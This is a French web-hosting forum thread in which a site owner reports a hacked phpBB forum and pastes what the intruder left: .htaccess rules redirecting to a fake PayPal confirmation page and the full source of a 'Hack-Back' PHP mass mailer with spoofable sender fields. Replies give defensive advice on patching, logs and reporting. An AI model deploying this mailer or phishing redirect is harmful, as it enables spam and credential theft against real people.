Aller au contenu

piratage de mon site + paypal !


Waheb8080

Sujets conseillés

Bonsoir,

voila j'expose un probléme que je viens de rencontrer aujourd'huit :

en faite, ce matin, j'ai la surprise de trouver mon forum (phpbb3) non fonctionnel avec un message d'erreur de la base de donnee.

je tente de me connecter sur mon cpanel -> le password est réfusé :mad2:

je contacte mon serveur qui m'envoi un nouveau password.

et quand je me connect à nouveau sur mon serveur surprise ! je trouve un nouveau dossier nommé (paypal) et un fichier nommé (mailer.php) et aussi je trouve mon .htaccess modifier :

RewriteEngine on
RewriteCond %{HTTP_HOST} !^www\.discussion-diagnostique\.com [NC]
RewriteRule (.*) [url="http://www.discussion-diagnostique.com/$1"]http://www.discussion-diagnostique.com/$1[/url] [QSA,R=301,L]
ErrorDocument 404 /RewriteCond %{HTTP_HOST} ^.*$
RewriteRule ^confirm-paypal/?$ [url="http://www.discussion-diagnostique.com/confirm-paypal/index.htm"]http://www.discussion-diagnostique.com/con...aypal/index.htm[/url] [R=302,L]

RewriteCond %{HTTP_HOST} ^.*$
RewriteRule ^confirm-paypal/?$ [url="http://discussion-diagnostique.com/paypal/index.htm"]http://discussion-diagnostique.com/paypal/index.htm[/url] [R=302,L]

RewriteCond %{HTTP_HOST} ^.*$
RewriteRule ^confirm-paypal/index.htm$ [url="http://discussion-diagnostique.com/paypal/index.htm"]http://discussion-diagnostique.com/paypal/index.htm[/url] [R=302,L]

voici ce qu'il y'a dans le mailer.php :

<?php
if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];

$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}


?>

<html>

<head>

<title></title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">








<style> html{scrollbar-base-color:#000000;scrollbar-arrow-color: #878787; scrollbar-track-color:#A878787;}.ws36 {font-size: 48px;}
.ws18 {font-size: 24px;}
.ws26 {font-size: 35px;}
--></style>








<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
font-size: 10px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body bgcolor="#000000" text="#00FF00">
<span class="style1">PHP eMailer<br>
made by !! hack-back !! ( <a href="mailto:h-b_AT_w.cn"><font color="#FF0000">h-b_AT_w.cn</font></a><font color="#FF0000">
</font>) .</span>

<form name="form1" method="post" action="" enctype="multipart/form-data">

<div style="background-color: #00FF00">
<p align="center"><b><font color="#FF0000" face="Comic Sans MS">!! Hack-Back
!! PHP Mailer Script</font></b><br>

</div>

<table width="100%" border="0">

<tr>

<td width="10%" height="24">

<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
Your Email:</font></div>

</td>

<td width="18%" height="24"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

<input name="from" value="<? print $from; ?>" size="30" style="background-color: #FF0000">

</font></td>

<td width="31%" height="24">

<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
Your Name:</font></div>

</td>

<td width="41%" height="24"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

<input name="realname" value="<? print $realname; ?>" size="30" style="background-color: #FF0000">

</font></td>

</tr>

<tr>

<td width="10%">

<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
Reply-To:</font></div>

</td>

<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

<input name="replyto" value="<? print $replyto; ?>" size="30" style="background-color: #FF0000">

</font></td>

<td width="31%">

<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
Attach File:</font></div>

</td>

<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

<input type="file" name="file" size="30" style="background-color: #FF0000">

</font></td>

</tr>

<tr>

<td width="10%">

<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
Subject:</font></div>

</td>

<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

<input name="subject" value="<? print $subject; ?>" size="90" style="background-color: #FF0000">

</font></td>

</tr>

<tr valign="top">

<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

<textarea name="message" cols="60" rows="10" style="background-color: #FF0000"><? print $message; ?></textarea>

<br>

<input type="radio" name="contenttype" value="plain">

Plain

<input name="contenttype" type="radio" value="html" checked>

HTML

<input type="hidden" name="action" value="send">

<input type="submit" value="Send eMails">

</font></td>

<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

<textarea name="emaillist" cols="30" rows="10" style="background-color: #FF0000"><? print $emaillist; ?></textarea>

</font></td>

</tr>

</table>

</form>



<?

if ($action){



if (!$from && !$subject && !$message && !$emaillist){

print "Please complete all fields before sending your message.";

exit;

}

$allemails = split("\n", $emaillist);
$numemails = count($allemails);

for($x=0; $x<$numemails; $x++){

$to = $allemails[$x];

if ($to){

$to = ereg_replace(" ", "", $to);

$message = ereg_replace("&email&", $to, $message);

$subject = ereg_replace("&email&", $to, $subject);

print "Sending mail to $to.......";

flush();

$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";

$header .= "MIME-Version: 1.0\r\n";

$header .= "Content-Type: text/$contenttype\r\n";

$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";

$header .= "$message\r\n";

mail($to, $subject, "", $header);

print "ok<br>";

flush();


}

}



}



?>
<p class="style1">PHP Mailer<br>
© !! hack-back !! (<a href="mailto:%20h-b_AT_w.cn"><font color="#FF0000"> h-b_AT_w.cn
</font> </a>) . <br>
</p>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo "<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully'); </script>";}
?>





<p> </p>





</body>

</html>

j'ai supprimé le .htaccess et le mailer.php. par contre j'ai laissé le dossier paypal pour preuve auprés de mon serveur. d'ailleurs si vous voulais voir de quoi il s'agit avant que je supprime le dossier :

http://www.discussion-diagnostique.com/paypal/index.htm

svp conseillez moi ! comment faire pour ne plus avoir ce genre de surprise ! est ce que je doit tous supprimer (mes bases de donnees ...)

merci !

Lien vers le commentaire
Partager sur d’autres sites

Je pense qu'un petit malin a trouvé une faille sur ton site et l'a exploitée... La meilleure chose à faire serait donc de la trouver et de la corriger.

Maintenant je ne suis pas expert côté sécurité, mais ca peut venir d'un script voire même de phpbb.

Je te conseille de fermer le site temporairement et de trouver conseils auprés d'un professionnel ou au moins d'un connaisseur.

Bon courage.

Lien vers le commentaire
Partager sur d’autres sites

Oui, je pense que le mieux est d'adresser également ta demande auprès de phpbb, et de leurs forums de support. S'il s'agit d'une faille nouvelle, ils iront probablement plus vite pour la corriger. D'autres part, assures toi que ton forum est bien à jour sur la dernière version de phpbb.

Et penses à regarder dans ton logg d'erreur côté serveur si tu vois pas ou sont passés les truands.

Maintenant le fet qu'ils aient eu accès à ton mot de passe cpanel, ce n'est pas logique.

ps : tu peux porter plainte à la police,

et supprimes vite le site paypal de la avant que paypal ne dépose plainte auprès de ton hébergeur pour "phishing"

Cordialement

Modifié par Himself
Lien vers le commentaire
Partager sur d’autres sites

  • 2 semaines plus tard...

Veuillez vous connecter pour commenter

Vous pourrez laisser un commentaire après vous êtes connecté.



Connectez-vous maintenant
×
×
  • Créer...